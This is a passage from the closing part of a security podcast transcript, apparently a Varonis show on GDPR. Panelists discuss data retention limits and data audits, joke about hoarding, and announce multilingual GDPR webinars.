In that case, you can only keep it for as long as it is a demonstrable requirement to have that. So I think it’s something at that level, which should be welcomed by organizations, not unless they are really…I mean my wife’s a bit of a hoarder. If she was running a business, she would definitely have many petabytes of information. But related to individuals, it would give me the excuse to throw it out when she isn’t looking.
Andy: Right. I was going to add that the GDPR says, I mean yes, you can collect the data, you can keep it, but I think there is somewhere that says that you have to put a time stamp on it. You have to say, “This is the data I have and, okay,” if it’s five years or ten years, but put some reasonable time stamp on this data and then follow through. So sure, collect it. But make sure it has a shelf life on it.
Cindy: Any final thoughts before we wrap up? Silence, I love it.
Michael: I was on mute, so I was talking extremely loudly while no one heard me. I was going to say my final thought was that, we kind of started this with Andy saying that a lot of this was common sense IT things.
And I think that’s probably the biggest takeaway. The thing to do immediately is to, I think, just do an audit of all of your data. That’s just good practice anyway. If you don’t have that at hand, you should start doing that. Whatever the regulations are, whatever your situation, it’s very, very hard to think of a situation where that wouldn’t be to your advantage. So I think that’s the first thing and most immediate thing any company should do.
Dietrich: That’s a very good point and something that also, related to GDPR, is the point within GDPR in terms of the data breach impact disbursements. That’s also understanding what you have, making sure that you have the appropriate controls around it. So that’s just understanding, going through that audit directly helps you for GDPR.
Cindy: Rob, you mentioned there is a webinar on GDPR. When can people tune in?
…
Mike: Rob told me there was a barbecue at his house for the next GDPR meeting. Just come on over, we’ll talk European regulations, smoke some brisket.
Cindy: I need some help from people de-hoarding my studio. First, I need to go home and change all my passwords because I have a password problem. Now you all know I’m a hoarder.
Mike: This is just leading up to you having your own Lifetime television series I mean.
Cindy: That will be exciting.
Mike: I’d watch it.
Cindy: It will be Tiger Mom, 2.0.
Rob: So yeah, so we’re having a webinar on July 21st in English and we are having another one on July 28th in German. So for anybody that’s interested in the GDPR, we are also doing it on the 28th in French. So we are having multiple languages for you and they can go to varonis.com and just search for GDPR in the upper right-hand corner and you should be able to find the registration form.
Cindy: Thanks so much, Rob.
Dietrich: Whether you speak it or not. Yeah, fantastic.
Cindy: Thank you so much Mike, Rob, Kilian, Dietrich, and Andy. And thank you all our listeners and viewers for joining us today.
If you want to follow us on Twitter and see what we are up to, you can find us @varonis, V-A-R-O-N-I-S. And if you want to subscribe to this podcast, you can go to iTunes and search for the Inside Out Security show.
There is a video version of this on YouTube then you can subscribe to on the Varonis channel.
And thank you and we’ll see you next week. Bye guys.
Join us Thursdays at 1:30ET for the Live show on Youtube, or use one of the links below to add us to your favorite podcasting app.
Check out our free 6-part email course (and earn CPE credits!)
The post GDPR – IOSS 13 appeared first on Varonis Blog.